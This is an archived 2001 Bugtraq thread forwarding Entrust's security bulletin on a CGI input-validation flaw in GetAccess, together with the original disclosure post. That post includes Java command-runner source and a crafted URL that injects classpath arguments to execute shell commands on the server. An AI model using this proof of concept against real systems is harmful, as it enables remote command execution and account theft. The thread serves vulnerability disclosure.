[22048] in bugtraq
FW: Entrust - getAccess
daemon@ATHENA.MIT.EDU (MARTAK,PAVEL (HP-Czechia,ex1))
Wed Aug 1 11:02:43 2001
Message-ID: <FFE5E286773CD411873400D0B747AC58038E4076@goedel.bbn.hp.com>
From: "MARTAK,PAVEL (HP-Czechia,ex1)" <pavel_martak@hp.com>
To: bugtraq@securityfocus.com
Date: Wed, 1 Aug 2001 09:04:10 +0200
MIME-Version: 1.0
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 8bit
I did not see Entrust answer posted to bugtraq so I'm sending it.
Pavel M.
-----Original Message-----
From: GetAccess Support [mailto:getaccess.support@entrust.com]
Sent: 30. července 2001 16:37
To: 'MARTAK,PAVEL (HP-Czechia,ex1)'
Subject: RE: Entrust - getAccess
Good morning Pavel.
I've included the press release and patch details below. Please let me know
if you need clarification.
Sincerely,
Jeff
Entrust Security Bulletin E01-001
==================================
Subject: Entrust GetAccess(tm) CGI Script Vulnerability
Originally posted: July 27, 2001
Summary
=======
An internet newsgroup posting on BUGTRAQ has identified a vulnerability in
Entrust GetAccess that could allow unauthorized execution of Java programs
installed on GetAccess web servers. This vulnerability has been confirmed by
Entrust and a patch is forthcoming.
Detailed information on this issue has been posted to the Entrust customer
extranet on both the Entrust GetAccess Portal
(https://login.encommerce.com/private/docs/techSupport/Patches-BugFix/e01-00
1.html) and the Entrust Customer Support Extranet
(https://www.entrust.com/support/resources/recentsecuritynotes.htm).
If you have trouble reaching the portals, please call: within North America
877-754-7878, elsewhere 613-270-3700. A hotline has been established for
the weekend of July 28th/29th, at +1 613 220 8357.
Affected Software Versions
==========================
- Entrust GetAccess, all versions and platforms
- Specifically, servers running the Access Service, administration
application, or runtimes.
Patch Availability
==================
Patches for this vulnerability will be posted to the Entrust customer
support extranet on or before Sunday, July 29th 2001.
==================
(c) Entrust Inc. 2001
Jeff McGrath
Web Security Team
getAccess Integration
Entrust, Inc.
"Securing the Internet"
Customer Support Phone: 1 877 PKI SUPT
mailto:support@entrust.com
http://www.entrust.com
-----Original Message-----
From: MARTAK,PAVEL (HP-Czechia,ex1) [mailto:pavel_martak@hp.com]
Sent: Monday, July 30, 2001 2:51 AM
To: support@entrust.com
Subject: FW: Entrust - getAccess
This was announced in BUGTRAQ.
PavelM
-----Original Message-----
From: rudi carell [mailto:rudicarell@hotmail.com]
Sent: 27. července 2001 13:34
To: BUGTRAQ@SECURITYFOCUS.COM
Subject: Entrust - getAccess
hola friends,
getAccess[tm] is used as a single-sign-on system often used for large
internet-portals.
--- snip (http://www.entrust.com) ---
Entrust GetAccess[tm] offers the most comprehensive solution for
consistently deploying and enforcing
basic and enhanced security across online applications, from Web browsers,
to enterprise applications and
legacy database systems.
--- snip ---
problem description:
due to missing input-validation it is possible to run(start) java-programs
on the "getaccess"-machine.
combined with public accessibly uploads or any other possibility to create
class-files on the server this vulnerability c
ould be used to run arbitrary system commands on the target machine( or
change getAccess parameters and steal any user ac
count you want BTW).
it should also be possible(but not proven yet) to exploit default-,install-
or demo classes within Java or getAccess whic
h would make the file-upload(creation) part unneeded!
(uninstall.class is very likely an effective DOS)
Example:
find exploitable getAccess-class(one which accepts params!) or upload a
"command" programm:
--- cut here (example cmd.java) ---
import java.io.*;
public class cmd {
public static void main(String args[]) {
s = null;
try {
Process p = Runtime.getRuntime().exec(args[0]+" "+args[1]);
BufferedReader stdInput = new BufferedReader(new
InputStreamReader(p.getInputStream()));
BufferedReader stdError = new BufferedReader(new
InputStreamReader(p.getErrorStream()));
System.out.println("Content-type: text/html\n\n");
while ((s = stdInput.readLine()) != null) { System.out.println(s); }
while ((s = stdError.readLine()) != null) { System.out.println(s); }
System.exit(0);
}
catch (IOException e) { e.printStackTrace(); System.exit(-1); }
} }
--- cut here ---
later then .. a http-request to :
http://hostname/sek-bin/login.gas.bat/x%20-classpath%20/whereever%20cmd%20/b
in/ls%20-alsi
.. will run "/whereever/cmd.class" and execute "/bin/ls -alsi"
Summary:
object: *.gas.bat (all the getAccess cgi-shell-scripts)
class: input validation
remote: yes
vendor: has been informed with a separate e-mail ( entrust@entrust.com )
(and BTW. i would NEVER EVER recommand to use shell-scripts for
authentication purposes!)
nice day,
rC
rudicarell@hotmail.com
security@freefly.com
http://www.freefly.com/security/
_________________________________________________________________
Get your FREE download of MSN Explorer at http://explorer.msn.com/intl.asp
